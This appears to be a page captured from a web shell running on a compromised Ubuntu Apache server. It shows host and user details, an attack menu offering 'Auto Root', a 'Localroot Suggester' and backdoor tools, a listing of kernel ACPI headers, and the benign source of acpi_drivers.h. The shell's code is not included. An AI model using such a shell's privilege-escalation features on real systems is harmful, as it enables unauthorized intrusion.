Linux jobworks 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:53:05 UTC 2026 x86_64
Apache/2.4.58 (Ubuntu)
Server IP : 10.0.1.5 & Your IP : 216.73.217.52
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
src /
linux-headers-6.8.0-136 /
include /
acpi /
Delete
Unzip
Name
Size
Permission
Date
Action
platform
[ DIR ]
drwxr-xr-x
2026-07-17 06:29
acbuffer.h
8.92
KB
-rw-r--r--
2024-03-10 20:38
acconfig.h
7.45
KB
-rw-r--r--
2024-03-10 20:38
acexcep.h
16.94
KB
-rw-r--r--
2024-03-10 20:38
acnames.h
2.22
KB
-rw-r--r--
2024-03-10 20:38
acoutput.h
16.67
KB
-rw-r--r--
2026-07-01 19:48
acpi.h
1.33
KB
-rw-r--r--
2024-03-10 20:38
acpi_bus.h
28.56
KB
-rw-r--r--
2026-07-01 19:48
acpi_drivers.h
2.65
KB
-rw-r--r--
2024-03-10 20:38
acpi_io.h
723
B
-rw-r--r--
2024-03-10 20:38
acpi_lpat.h
1.16
KB
-rw-r--r--
2024-03-10 20:38
acpi_numa.h
944
B
-rw-r--r--
2024-03-10 20:38
acpiosxf.h
11.35
KB
-rw-r--r--
2024-03-10 20:38
acpixf.h
31.46
KB
-rw-r--r--
2026-07-01 19:48
acrestyp.h
19.5
KB
-rw-r--r--
2024-03-10 20:38
actbl.h
18.37
KB
-rw-r--r--
2024-03-10 20:38
actbl1.h
47.75
KB
-rw-r--r--
2024-03-10 20:38
actbl2.h
78.72
KB
-rw-r--r--
2024-03-10 20:38
actbl3.h
22.12
KB
-rw-r--r--
2024-03-10 20:38
actypes.h
42.23
KB
-rw-r--r--
2026-07-01 19:48
acuuid.h
3.59
KB
-rw-r--r--
2024-03-10 20:38
apei.h
1.4
KB
-rw-r--r--
2024-03-10 20:38
battery.h
658
B
-rw-r--r--
2024-03-10 20:38
button.h
401
B
-rw-r--r--
2024-03-10 20:38
cppc_acpi.h
5.72
KB
-rw-r--r--
2026-07-01 19:48
ghes.h
3.59
KB
-rw-r--r--
2026-07-01 19:48
hed.h
370
B
-rw-r--r--
2024-03-10 20:38
nfit.h
351
B
-rw-r--r--
2024-03-10 20:38
pcc.h
1.44
KB
-rw-r--r--
2026-07-01 19:48
proc_cap_intel.h
1.35
KB
-rw-r--r--
2024-03-10 20:38
processor.h
12
KB
-rw-r--r--
2024-03-10 20:38
reboot.h
201
B
-rw-r--r--
2024-03-10 20:38
video.h
3.74
KB
-rw-r--r--
2026-07-01 19:48
Save
Rename
/* SPDX-License-Identifier: GPL-2.0-or-later */ /* * acpi_drivers.h ($Revision: 31 $) * * Copyright (C) 2001, 2002 Andy Grover <andrew.grover@intel.com> * Copyright (C) 2001, 2002 Paul Diefenbaugh <paul.s.diefenbaugh@intel.com> */ #ifndef __ACPI_DRIVERS_H__ #define __ACPI_DRIVERS_H__ #define ACPI_MAX_STRING 80 /* * _HID definitions * HIDs must conform to ACPI spec(6.1.4) * Linux specific HIDs do not apply to this and begin with LNX: */ #define ACPI_POWER_HID "LNXPOWER" #define ACPI_PROCESSOR_OBJECT_HID "LNXCPU" #define ACPI_SYSTEM_HID "LNXSYSTM" #define ACPI_THERMAL_HID "LNXTHERM" #define ACPI_BUTTON_HID_POWERF "LNXPWRBN" #define ACPI_BUTTON_HID_SLEEPF "LNXSLPBN" #define ACPI_VIDEO_HID "LNXVIDEO" #define ACPI_BAY_HID "LNXIOBAY" #define ACPI_DOCK_HID "LNXDOCK" #define ACPI_ECDT_HID "LNXEC" /* SMBUS HID definition as supported by Microsoft Windows */ #define ACPI_SMBUS_MS_HID "SMB0001" /* Quirk for broken IBM BIOSes */ #define ACPI_SMBUS_IBM_HID "SMBUSIBM" /* * For fixed hardware buttons, we fabricate acpi_devices with HID * ACPI_BUTTON_HID_POWERF or ACPI_BUTTON_HID_SLEEPF. Fixed hardware * signals only an event; it doesn't supply a notification value. * To allow drivers to treat notifications from fixed hardware the * same as those from real devices, we turn the events into this * notification value. */ #define ACPI_FIXED_HARDWARE_EVENT 0x100 /* -------------------------------------------------------------------------- PCI -------------------------------------------------------------------------- */ /* ACPI PCI Interrupt Link */ int acpi_irq_penalty_init(void); int acpi_pci_link_allocate_irq(acpi_handle handle, int index, int *triggering, int *polarity, char **name); int acpi_pci_link_free_irq(acpi_handle handle); /* ACPI PCI Device Binding */ struct pci_bus; #ifdef CONFIG_PCI struct pci_dev *acpi_get_pci_dev(acpi_handle); #else static inline struct pci_dev *acpi_get_pci_dev(acpi_handle handle) { return NULL; } #endif /* Arch-defined function to add a bus to the system */ struct pci_bus *pci_acpi_scan_root(struct acpi_pci_root *root); #ifdef CONFIG_X86 void pci_acpi_crs_quirks(void); #else static inline void pci_acpi_crs_quirks(void) { } #endif /*-------------------------------------------------------------------------- Dock Station -------------------------------------------------------------------------- */ #ifdef CONFIG_ACPI_DOCK extern int is_dock_device(struct acpi_device *adev); #else static inline int is_dock_device(struct acpi_device *adev) { return 0; } #endif /* CONFIG_ACPI_DOCK */ #endif /*__ACPI_DRIVERS_H__*/